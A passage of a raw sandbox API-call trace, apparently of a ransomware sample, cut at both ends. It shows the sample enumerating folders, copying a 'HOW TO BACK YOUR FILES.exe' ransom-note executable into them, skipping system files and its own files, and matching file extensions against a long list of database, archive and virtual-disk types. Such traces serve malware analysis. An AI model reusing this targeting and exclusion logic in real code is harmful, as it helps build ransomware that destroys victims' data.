(HeapHandle=0x2b0000, Flags=0x0, Size=0xb0) returned 0x2c8eb8 [0089.493] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0089.493] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c824c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c824c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1 [0089.493] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.493] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="aoldtz.exe") returned -1 [0089.493] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2=".") returned 1 [0089.493] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="..") returned 1 [0089.493] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="windows") returned -1 [0089.493] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="bootmgr") returned -1 [0089.493] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="temp") returned -1 [0089.493] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="pagefile.sys") returned -1 [0089.493] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="boot") returned -1 [0089.493] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="ids.txt") returned -1 [0089.493] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="ntuser.dat") returned -1 [0089.493] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="perflogs") returned -1 [0089.493] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="MSBuild") returned -1 [0089.493] lstrlenW (lpString="{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 38 [0089.493] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 87 [0089.493] lstrcpyW (in: lpString1=0x2cce462, lpString2="{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="{8702d817-5aad-4674-9ef3-4d3decd87120}" [0089.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0089.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb0) returned 0x2e87c0 [0089.494] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0089.494] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c824c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c824c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0 [0089.494] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.494] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0089.494] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0089.494] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0089.494] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0089.494] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 87 [0089.494] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0089.494] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.494] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.494] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.495] GetLastError () returned 0x0 [0089.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.495] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.495] CloseHandle (hObject=0x120) returned 1 [0089.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.495] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.495] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c824c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c824c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.495] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.495] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.495] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.495] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c824c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c824c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.495] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.495] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.495] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.495] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.495] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0af2f7, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x9c0af2f7, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x9c0af2f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1 [0089.495] lstrcmpiW (lpString1="background.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.495] lstrcmpiW (lpString1="background.png", lpString2="aoldtz.exe") returned 1 [0089.495] lstrcmpiW (lpString1="background.png", lpString2=".") returned 1 [0089.495] lstrcmpiW (lpString1="background.png", lpString2="..") returned 1 [0089.495] lstrcmpiW (lpString1="background.png", lpString2="windows") returned -1 [0089.495] lstrcmpiW (lpString1="background.png", lpString2="bootmgr") returned -1 [0089.495] lstrcmpiW (lpString1="background.png", lpString2="temp") returned -1 [0089.495] lstrcmpiW (lpString1="background.png", lpString2="pagefile.sys") returned -1 [0089.495] lstrcmpiW (lpString1="background.png", lpString2="boot") returned -1 [0089.496] lstrcmpiW (lpString1="background.png", lpString2="ids.txt") returned -1 [0089.496] lstrcmpiW (lpString1="background.png", lpString2="ntuser.dat") returned -1 [0089.496] lstrcmpiW (lpString1="background.png", lpString2="perflogs") returned -1 [0089.496] lstrcmpiW (lpString1="background.png", lpString2="MSBuild") returned -1 [0089.496] lstrlenW (lpString="background.png") returned 14 [0089.496] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*") returned 89 [0089.496] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="background.png" | out: lpString1="background.png") returned="background.png" [0089.496] lstrlenW (lpString="background.png") returned 14 [0089.496] lstrlenW (lpString="Ares865") returned 7 [0089.496] lstrcmpiW (lpString1="und.png", lpString2="Ares865") returned 1 [0089.496] lstrlenW (lpString=".dll") returned 4 [0089.496] lstrcmpiW (lpString1="background.png", lpString2=".dll") returned 1 [0089.496] lstrlenW (lpString=".lnk") returned 4 [0089.496] lstrcmpiW (lpString1="background.png", lpString2=".lnk") returned 1 [0089.496] lstrlenW (lpString=".ini") returned 4 [0089.496] lstrcmpiW (lpString1="background.png", lpString2=".ini") returned 1 [0089.496] lstrlenW (lpString=".sys") returned 4 [0089.496] lstrcmpiW (lpString1="background.png", lpString2=".sys") returned 1 [0089.496] lstrlenW (lpString="background.png") returned 14 [0089.496] lstrlenW (lpString="bak") returned 3 [0089.496] lstrcmpiW (lpString1="png", lpString2="bak") returned 1 [0089.496] lstrlenW (lpString="ba_") returned 3 [0089.496] lstrcmpiW (lpString1="png", lpString2="ba_") returned 1 [0089.496] lstrlenW (lpString="dbb") returned 3 [0089.496] lstrcmpiW (lpString1="png", lpString2="dbb") returned 1 [0089.496] lstrlenW (lpString="vmdk") returned 4 [0089.496] lstrcmpiW (lpString1=".png", lpString2="vmdk") returned -1 [0089.496] lstrlenW (lpString="rar") returned 3 [0089.496] lstrcmpiW (lpString1="png", lpString2="rar") returned -1 [0089.496] lstrlenW (lpString="zip") returned 3 [0089.496] lstrcmpiW (lpString1="png", lpString2="zip") returned -1 [0089.496] lstrlenW (lpString="tgz") returned 3 [0089.496] lstrcmpiW (lpString1="png", lpString2="tgz") returned -1 [0089.496] lstrlenW (lpString="vbox") returned 4 [0089.496] lstrcmpiW (lpString1=".png", lpString2="vbox") returned -1 [0089.496] lstrlenW (lpString="vdi") returned 3 [0089.496] lstrcmpiW (lpString1="png", lpString2="vdi") returned -1 [0089.496] lstrlenW (lpString="vhd") returned 3 [0089.496] lstrcmpiW (lpString1="png", lpString2="vhd") returned -1 [0089.497] lstrlenW (lpString="vhdx") returned 4 [0089.497] lstrcmpiW (lpString1=".png", lpString2="vhdx") returned -1 [0089.497] lstrlenW (lpString="avhd") returned 4 [0089.497] lstrcmpiW (lpString1=".png", lpString2="avhd") returned -1 [0089.497] lstrlenW (lpString="db") returned 2 [0089.497] lstrcmpiW (lpString1="ng", lpString2="db") returned 1 [0089.497] lstrlenW (lpString="db2") returned 3 [0089.497] lstrcmpiW (lpString1="png", lpString2="db2") returned 1 [0089.497] lstrlenW (lpString="db3") returned 3 [0089.497] lstrcmpiW (lpString1="png", lpString2="db3") returned 1 [0089.497] lstrlenW (lpString="dbf") returned 3 [0089.497] lstrcmpiW (lpString1="png", lpString2="dbf") returned 1 [0089.497] lstrlenW (lpString="mdf") returned 3 [0089.497] lstrcmpiW (lpString1="png", lpString2="mdf") returned 1 [0089.497] lstrlenW (lpString="mdb") returned 3 [0089.497] lstrcmpiW (lpString1="png", lpString2="mdb") returned 1 [0089.497] lstrlenW (lpString="sql") returned 3 [0089.497] lstrcmpiW (lpString1="png", lpString2="sql") returned -1 [0089.497] lstrlenW (lpString="sqlite") returned 6 [0089.497] lstrcmpiW (lpString1="nd.png", lpString2="sqlite") returned -1 [0089.497] lstrlenW (lpString="sqlite3") returned 7 [0089.497] lstrcmpiW (lpString1="und.png", lpString2="sqlite3") returned 1 [0089.497] lstrlenW (lpString="sqlitedb") returned 8 [0089.497] lstrcmpiW (lpString1="ound.png", lpString2="sqlitedb") returned -1 [0089.497] lstrlenW (lpString="xml") returned 3 [0089.497] lstrcmpiW (lpString1="png", lpString2="xml") returned -1 [0089.497] lstrlenW (lpString="$er") returned 3 [0089.497] lstrcmpiW (lpString1="png", lpString2="$er") returned 1 [0089.497] lstrlenW (lpString="4dd") returned 3 [0089.497] lstrcmpiW (lpString1="png", lpString2="4dd") returned 1 [0089.497] lstrlenW (lpString="4dl") returned 3 [0089.497] lstrcmpiW (lpString1="png", lpString2="4dl") returned 1 [0089.497] lstrlenW (lpString="^^^") returned 3 [0089.497] lstrcmpiW (lpString1="png", lpString2="^^^") returned 1 [0089.497] lstrlenW (lpString="abs") returned 3 [0089.497] lstrcmpiW (lpString1="png", lpString2="abs") returned 1 [0089.497] lstrlenW (lpString="abx") returned 3 [0089.497] lstrcmpiW (lpString1="png", lpString2="abx") returned 1 [0089.497] lstrlenW (lpString="accdb") returned 5 [0089.498] lstrcmpiW (lpString1="d.png", lpString2="accdb") returned 1 [0089.498] lstrlenW (lpString="accdc") returned 5 [0089.498] lstrcmpiW (lpString1="d.png", lpString2="accdc") returned 1 [0089.498] lstrlenW (lpString="accde") returned 5 [0089.498] lstrcmpiW (lpString1="d.png", lpString2="accde") returned 1 [0089.498] lstrlenW (lpString="accdr") returned 5 [0089.498] lstrcmpiW (lpString1="d.png", lpString2="accdr") returned 1 [0089.498] lstrlenW (lpString="accdt") returned 5 [0089.498] lstrcmpiW (lpString1="d.png", lpString2="accdt") returned 1 [0089.498] lstrlenW (lpString="accdw") returned 5 [0089.498] lstrcmpiW (lpString1="d.png", lpString2="accdw") returned 1 [0089.498] lstrlenW (lpString="accft") returned 5 [0089.498] lstrcmpiW (lpString1="d.png", lpString2="accft") returned 1 [0089.498] lstrlenW (lpString="adb") returned 3 [0089.498] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0089.498] lstrlenW (lpString="adb") returned 3 [0089.498] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0089.498] lstrlenW (lpString="ade") returned 3 [0089.498] lstrcmpiW (lpString1="png", lpString2="ade") returned 1 [0089.498] lstrlenW (lpString="adf") returned 3 [0089.498] lstrcmpiW (lpString1="png", lpString2="adf") returned 1 [0089.498] lstrlenW (lpString="adn") returned 3 [0089.498] lstrcmpiW (lpString1="png", lpString2="adn") returned 1 [0089.498] lstrlenW (lpString="adp") returned 3 [0089.498] lstrcmpiW (lpString1="png", lpString2="adp") returned 1 [0089.498] lstrlenW (lpString="alf") returned 3 [0089.498] lstrcmpiW (lpString1="png", lpString2="alf") returned 1 [0089.498] lstrlenW (lpString="ask") returned 3 [0089.498] lstrcmpiW (lpString1="png", lpString2="ask") returned 1 [0089.498] lstrlenW (lpString="btr") returned 3 [0089.498] lstrcmpiW (lpString1="png", lpString2="btr") returned 1 [0089.498] lstrlenW (lpString="cat") returned 3 [0089.498] lstrcmpiW (lpString1="png", lpString2="cat") returned 1 [0089.498] lstrlenW (lpString="cdb") returned 3 [0089.498] lstrcmpiW (lpString1="png", lpString2="cdb") returned 1 [0089.498] lstrlenW (lpString="ckp") returned 3 [0089.498] lstrcmpiW (lpString1="png", lpString2="ckp") returned 1 [0089.498] lstrlenW (lpString="cma") returned 3 [0089.498] lstrcmpiW (lpString1="png", lpString2="cma") returned 1 [0089.499] lstrlenW (lpString="cpd") returned 3 [0089.499] lstrcmpiW (lpString1="png", lpString2="cpd") returned 1 [0089.499] lstrlenW (lpString="dacpac") returned 6 [0089.499] lstrcmpiW (lpString1="nd.png", lpString2="dacpac") returned 1 [0089.499] lstrlenW (lpString="dad") returned 3 [0089.499] lstrcmpiW (lpString1="png", lpString2="dad") returned 1 [0089.499] lstrlenW (lpString="dadiagrams") returned 10 [0089.499] lstrcmpiW (lpString1="ground.png", lpString2="dadiagrams") returned 1 [0089.499] lstrlenW (lpString="daschema") returned 8 [0089.499] lstrcmpiW (lpString1="ound.png", lpString2="daschema") returned 1 [0089.499] lstrlenW (lpString="db-journal") returned 10 [0089.499] lstrcmpiW (lpString1="ground.png", lpString2="db-journal") returned 1 [0089.499] lstrlenW (lpString="db-shm") returned 6 [0089.499] lstrcmpiW (lpString1="nd.png", lpString2="db-shm") returned 1 [0089.499] lstrlenW (lpString="db-wal") returned 6 [0089.499] lstrcmpiW (lpString1="nd.png", lpString2="db-wal") returned 1 [0089.499] lstrlenW (lpString="dbc") returned 3 [0089.499] lstrcmpiW (lpString1="png", lpString2="dbc") returned 1 [0089.499] lstrlenW (lpString="dbs") returned 3 [0089.499] lstrcmpiW (lpString1="png", lpString2="dbs") returned 1 [0089.499] lstrlenW (lpString="dbt") returned 3 [0089.499] lstrcmpiW (lpString1="png", lpString2="dbt") returned 1 [0089.499] lstrlenW (lpString="dbv") returned 3 [0089.499] lstrcmpiW (lpString1="png", lpString2="dbv") returned 1 [0089.499] lstrlenW (lpString="dbx") returned 3 [0089.499] lstrcmpiW (lpString1="png", lpString2="dbx") returned 1 [0089.499] lstrlenW (lpString="dcb") returned 3 [0089.499] lstrcmpiW (lpString1="png", lpString2="dcb") returned 1 [0089.499] lstrlenW (lpString="dct") returned 3 [0089.499] lstrcmpiW (lpString1="png", lpString2="dct") returned 1 [0089.499] lstrlenW (lpString="dcx") returned 3 [0089.499] lstrcmpiW (lpString1="png", lpString2="dcx") returned 1 [0089.499] lstrlenW (lpString="ddl") returned 3 [0089.499] lstrcmpiW (lpString1="png", lpString2="ddl") returned 1 [0089.499] lstrlenW (lpString="dlis") returned 4 [0089.499] lstrcmpiW (lpString1=".png", lpString2="dlis") returned -1 [0089.499] lstrlenW (lpString="dp1") returned 3 [0089.499] lstrcmpiW (lpString1="png", lpString2="dp1") returned 1 [0089.499] lstrlenW (lpString="dqy") returned 3 [0089.499] lstrcmpiW (lpString1="png", lpString2="dqy") returned 1 [0089.500] lstrlenW (lpString="dsk") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="dsk") returned 1 [0089.500] lstrlenW (lpString="dsn") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="dsn") returned 1 [0089.500] lstrlenW (lpString="dtsx") returned 4 [0089.500] lstrcmpiW (lpString1=".png", lpString2="dtsx") returned -1 [0089.500] lstrlenW (lpString="dxl") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="dxl") returned 1 [0089.500] lstrlenW (lpString="eco") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="eco") returned 1 [0089.500] lstrlenW (lpString="ecx") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="ecx") returned 1 [0089.500] lstrlenW (lpString="edb") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="edb") returned 1 [0089.500] lstrlenW (lpString="epim") returned 4 [0089.500] lstrcmpiW (lpString1=".png", lpString2="epim") returned -1 [0089.500] lstrlenW (lpString="fcd") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="fcd") returned 1 [0089.500] lstrlenW (lpString="fdb") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="fdb") returned 1 [0089.500] lstrlenW (lpString="fic") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="fic") returned 1 [0089.500] lstrlenW (lpString="flexolibrary") returned 12 [0089.500] lstrcmpiW (lpString1="ckground.png", lpString2="flexolibrary") returned -1 [0089.500] lstrlenW (lpString="fm5") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="fm5") returned 1 [0089.500] lstrlenW (lpString="fmp") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="fmp") returned 1 [0089.500] lstrlenW (lpString="fmp12") returned 5 [0089.500] lstrcmpiW (lpString1="d.png", lpString2="fmp12") returned -1 [0089.500] lstrlenW (lpString="fmpsl") returned 5 [0089.500] lstrcmpiW (lpString1="d.png", lpString2="fmpsl") returned -1 [0089.500] lstrlenW (lpString="fol") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="fol") returned 1 [0089.500] lstrlenW (lpString="fp3") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="fp3") returned 1 [0089.500] lstrlenW (lpString="fp4") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="fp4") returned 1 [0089.500] lstrlenW (lpString="fp5") returned 3 [0089.500] lstrcmpiW (lpString1="png", lpString2="fp5") returned 1 [0089.501] lstrlenW (lpString="fp7") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="fp7") returned 1 [0089.501] lstrlenW (lpString="fpt") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="fpt") returned 1 [0089.501] lstrlenW (lpString="frm") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="frm") returned 1 [0089.501] lstrlenW (lpString="gdb") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0089.501] lstrlenW (lpString="gdb") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0089.501] lstrlenW (lpString="grdb") returned 4 [0089.501] lstrcmpiW (lpString1=".png", lpString2="grdb") returned -1 [0089.501] lstrlenW (lpString="gwi") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="gwi") returned 1 [0089.501] lstrlenW (lpString="hdb") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="hdb") returned 1 [0089.501] lstrlenW (lpString="his") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="his") returned 1 [0089.501] lstrlenW (lpString="ib") returned 2 [0089.501] lstrcmpiW (lpString1="ng", lpString2="ib") returned 1 [0089.501] lstrlenW (lpString="idb") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="idb") returned 1 [0089.501] lstrlenW (lpString="ihx") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="ihx") returned 1 [0089.501] lstrlenW (lpString="itdb") returned 4 [0089.501] lstrcmpiW (lpString1=".png", lpString2="itdb") returned -1 [0089.501] lstrlenW (lpString="itw") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="itw") returned 1 [0089.501] lstrlenW (lpString="jet") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="jet") returned 1 [0089.501] lstrlenW (lpString="jtx") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="jtx") returned 1 [0089.501] lstrlenW (lpString="kdb") returned 3 [0089.501] lstrcmpiW (lpString1="png", lpString2="kdb") returned 1 [0089.501] lstrlenW (lpString="kexi") returned 4 [0089.501] lstrcmpiW (lpString1=".png", lpString2="kexi") returned -1 [0089.501] lstrlenW (lpString="kexic") returned 5 [0089.501] lstrcmpiW (lpString1="d.png", lpString2="kexic") returned -1 [0089.501] lstrlenW (lpString="kexis") returned 5 [0089.501] lstrcmpiW (lpString1="d.png", lpString2="kexis") returned -1 [0089.502] lstrlenW (lpString="lgc") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="lgc") returned 1 [0089.502] lstrlenW (lpString="lwx") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="lwx") returned 1 [0089.502] lstrlenW (lpString="maf") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="maf") returned 1 [0089.502] lstrlenW (lpString="maq") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="maq") returned 1 [0089.502] lstrlenW (lpString="mar") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="mar") returned 1 [0089.502] lstrlenW (lpString="marshal") returned 7 [0089.502] lstrcmpiW (lpString1="und.png", lpString2="marshal") returned 1 [0089.502] lstrlenW (lpString="mas") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="mas") returned 1 [0089.502] lstrlenW (lpString="mav") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="mav") returned 1 [0089.502] lstrlenW (lpString="maw") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="maw") returned 1 [0089.502] lstrlenW (lpString="mdbhtml") returned 7 [0089.502] lstrcmpiW (lpString1="und.png", lpString2="mdbhtml") returned 1 [0089.502] lstrlenW (lpString="mdn") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="mdn") returned 1 [0089.502] lstrlenW (lpString="mdt") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="mdt") returned 1 [0089.502] lstrlenW (lpString="mfd") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="mfd") returned 1 [0089.502] lstrlenW (lpString="mpd") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="mpd") returned 1 [0089.502] lstrlenW (lpString="mrg") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="mrg") returned 1 [0089.502] lstrlenW (lpString="mud") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="mud") returned 1 [0089.502] lstrlenW (lpString="mwb") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="mwb") returned 1 [0089.502] lstrlenW (lpString="myd") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="myd") returned 1 [0089.502] lstrlenW (lpString="ndf") returned 3 [0089.502] lstrcmpiW (lpString1="png", lpString2="ndf") returned 1 [0089.503] lstrlenW (lpString="nnt") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="nnt") returned 1 [0089.503] lstrlenW (lpString="nrmlib") returned 6 [0089.503] lstrcmpiW (lpString1="nd.png", lpString2="nrmlib") returned -1 [0089.503] lstrlenW (lpString="ns2") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="ns2") returned 1 [0089.503] lstrlenW (lpString="ns3") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="ns3") returned 1 [0089.503] lstrlenW (lpString="ns4") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="ns4") returned 1 [0089.503] lstrlenW (lpString="nsf") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="nsf") returned 1 [0089.503] lstrlenW (lpString="nv") returned 2 [0089.503] lstrcmpiW (lpString1="ng", lpString2="nv") returned -1 [0089.503] lstrlenW (lpString="nv2") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="nv2") returned 1 [0089.503] lstrlenW (lpString="nwdb") returned 4 [0089.503] lstrcmpiW (lpString1=".png", lpString2="nwdb") returned -1 [0089.503] lstrlenW (lpString="nyf") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="nyf") returned 1 [0089.503] lstrlenW (lpString="odb") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0089.503] lstrlenW (lpString="odb") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0089.503] lstrlenW (lpString="oqy") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="oqy") returned 1 [0089.503] lstrlenW (lpString="ora") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="ora") returned 1 [0089.503] lstrlenW (lpString="orx") returned 3 [0089.503] 